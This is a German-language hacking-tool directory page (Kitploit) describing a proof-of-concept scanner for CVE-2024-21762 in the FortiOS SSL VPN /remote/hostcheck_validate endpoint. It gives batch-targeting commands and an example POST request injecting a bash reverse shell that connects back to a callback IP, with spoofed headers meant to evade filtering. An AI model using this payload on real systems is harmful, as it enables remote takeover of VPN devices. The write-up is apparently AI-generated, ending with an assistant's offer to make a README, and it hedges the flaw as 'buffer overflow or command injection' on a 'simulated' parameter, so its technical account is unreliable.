Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21762_FortiNet_PoC — Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt, mit Auslieferung einer Reverse-Shell-Nutzlast. | Kitploit
Tools/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt, mit Auslieferung einer Reverse-Shell-Nutzlast.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
212vor 1 JahrNoch nicht geprüft
Teilen

CVE-2024-21762_FortiNet_PoC

Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt und Reverse-Shell-Payloads liefert.

Hier ist ein GitHub-ähnlicher Writeup für Ihr Projekt, einschließlich einer sauberen und prägnanten Zusammenfassung, einer Nutzungsanleitung und Kontext dazu, wie es zu der CVE passt.


🔥 Projektname: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Zusammenfassung (für die GitHub-Beschreibungszeile):

Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt und Reverse-Shell-Payloads liefert.


📜 Übersicht

Dieses Python-Skript ist ein PoC (Proof of Concept)-Tool, das entwickelt wurde, um mit der Fortinet FortiOS SSL VPN-Schnittstelle zu interagieren und auf CVE-2024-21762 abzielt — eine stackbasierte Pufferüberlauf- oder Befehlsinjektions-Schwachstelle im /remote/hostcheck_validate-Endpunkt.

Haftungsausschluss: Dies ist nur für Bildungs- und autorisierte Testzwecke bestimmt.


🧬 Funktionsweise

  • Sendet eine präparierte POST-Anfrage an /remote/hostcheck_validate auf einer FortiGate SSL VPN-Schnittstelle.
  • Injiziert einen Bash-Reverse-Shell-Payload in einem simulierten anfälligen Parameter (host).
  • Verwendet gefälschte Header (User-Agent, Cookie), um die oberflächliche FortiOS-Anfragefilterung zu umgehen.
  • Empfängt und protokolliert Serverantworten, um den Erfolg der Ausnutzung zu bewerten.
  • Unterstützt Einzel- oder Batch-Testdurchführung mit Datei-Ein-/Ausgabe-Automatisierung und Fortschrittsbalken.

🛠️ Funktionen

  • 🧪 Reverse-Shell-Payload-Injektion über kontrolliertes Formularfeld
  • 🧾 Vollständige HTTP-Antwortaufzeichnung für die Analyse (last_response.txt)
  • 📊 Fortschrittsbalken zur Verfolgung im Einzel-/Batch-Modus
  • 🗃️ Batch-Modus mit Unterstützung für Ein-/Ausgabedateien
  • 🔄 Modular und erweiterbar

⚙️ Anforderungen

  • Python 3.6+
  • tqdm zur Fortschrittsvisualisierung

Abhängigkeiten installieren:

root@kitploit:~
pip install tqdm

🚀 Verwendung

Einzelzielmodus

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

Batch-Modus

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: Liste der Ziele im Format IP:PORT, eine pro Zeile
  • results.txt: Ausgabeprotokoll der Exploit-Versuche

📥 Beispiel für gesendeten Payload

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Protokolle

Das Tool schreibt die vollständige HTTP-Antwort jedes Versuchs in:

root@kitploit:~
last_response.txt

Verwenden Sie dies, um zu überprüfen, ob die Anfrage geparst, abgelehnt oder ein Fehlercode zurückgegeben wurde.


⚠️ Rechtliches

Dieser Code wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt. Verwenden Sie dies nicht in Netzwerken oder Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


✍️ Autor

Carter — Cybersicherheitsingenieur, Red/Purple-Team-Enthusiast, PoC-Automatisierungs-Nerd.


Möchten Sie dies in eine README.md-Datei + Repo-Struktur verpackt haben, die bereit ist, auf GitHub gepusht zu werden? Ich kann das als Nächstes generieren.

Tool herunterladen